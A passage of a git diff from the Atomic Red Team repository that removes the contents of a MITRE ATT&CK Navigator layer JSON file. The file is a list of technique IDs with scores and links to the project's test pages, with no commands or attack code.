Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1547.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1548.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1550","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1556.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1557","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1558","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1559","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1563.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1563","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1566.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1566","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1569.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1569","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1588.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1588","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 03281866..e69de29b 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +0,0 @@ -{"version":"4.3","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1021","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1037.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"}]},{"techniqueID":"T1053.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"}]},{"techniqueID":"T1053.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View 